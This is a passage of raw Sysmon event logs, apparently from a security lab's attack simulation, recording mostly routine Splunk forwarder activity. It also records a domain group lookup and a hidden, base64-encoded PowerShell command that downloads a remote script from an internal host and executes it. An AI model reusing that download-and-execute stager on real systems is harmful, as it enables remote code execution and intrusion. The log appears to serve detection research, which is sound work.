19_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.545{B81B27B7-8369-613A-CE96-03000000C801}3272C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" group /domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 354300x800000000000000035128263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.229{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62129-false10.0.1.12-8089- 23542300x800000000000000035128262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.188{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA9E15375E343576F639D22569A99F50,SHA256=3BF7C61052BCD7EFFBEE26A12B2C3499F3AF5E8E5C7E2B2A7A9DD861D96309FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:02.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=34E20B6A2EAD42FD3B8B5E14D66F34D4,SHA256=FEB00BD6B51FE77D2D57C2DCC4E198363350CE322520974E1AF9E3A03B680281,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:02.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68E585A04D7756B169B134D6DFA201A6,SHA256=1E2934A621AB081B50650AE8AAC2632C17690C40D8780F3FC1ECE0CC5B42AED9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:02.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2A7324B72112DBFC9770683172BDEFC,SHA256=12D3A9F4A4ADB208424C6F767BC784A738C4F715791BFC18E6DF8BE8577C83F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.323{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62130-false10.0.1.12-8000- 23542300x800000000000000035128285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:02.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C7F35D439B2D8E7E2D89FEC7C26BCF7,SHA256=D8BE9834F6EA14A4A442A4AB343FE0E1DCFD632D809D9317899217B8E096FFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:03.208{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F833A7A0E46EE1D5EC30DD671F1EC6FD,SHA256=7B01EE587EFDF3683FEBA2F45D8511AB7F816CD011BD23940DF22838B0E4B31D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.701{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62131-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.230{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62136-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.868{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62135-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.867{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62134-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.866{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62133-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.861{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62132-false10.0.1.14WIN-DC-128445microsoft-ds 23542300x800000000000000035128292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:04.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=504F163F87842B0CB9CB85AF18A85320,SHA256=1BBD11EBDC2F2F6DCC1213B1C7E88DF4588FF7A38285A4EC6CB64C644E0BC993,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:05.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36FFAB659B5B25494EC11E88007BB5A9,SHA256=8283A242979021FACD5A9E7628632A413CC4407C9FAADE71509B8C89CB19E352,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:06.274{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C8106C0DAB9DD2A55E5C2442D726EFC,SHA256=844D472D9A5D422A99A3F5B2A638EE9184EFF65EDAD5C9D4245AC224EB6F9742,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:31.419{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62137-false10.0.1.12-8000- 23542300x800000000000000035128300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:07.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCE9DC321098309EACE2341595F22763,SHA256=EF8A851EC754E729195DB4BAA062645C717C7A85A100A6023608A90514CCB468,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:08.319{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC10FEF4ED6E7AB41D4D397D78BA71AA,SHA256=7C68D05A187D05F39D8BB1BB2E04A02AA01217AC64572CA830C338365D8E4A1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:09.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82C9D14AA01A6120435A94D261C63FBE,SHA256=1CAA8A8F85ED59981F2469CF25561BCDFC6267C28ECE11C1EB8FBF1521D000D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:09.087{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EF50EB65EF100B5D6357157CB44555CD,SHA256=F6A7FF83A9044C9D0A5D65A92DE21CC0965BA6F8D4AFCDF13410EDAF73E001B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.885{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8372-613A-D196-03000000C801}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.885{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.885{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.885{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.885{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.885{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8372-613A-D196-03000000C801}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.885{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8372-613A-D196-03000000C801}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.870{B81B27B7-8372-613A-D196-03000000C801}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035128315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:34.254{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62138-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.416{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DF02F0A962AE9313CB215684A621629,SHA256=5238AF782397BA6B89616D19C9FC36C4EFC27B01C99AA62E69764CA292CC4AF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.369{B81B27B7-8372-613A-D096-03000000C801}28761424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.201{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8372-613A-D096-03000000C801}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.201{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.201{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 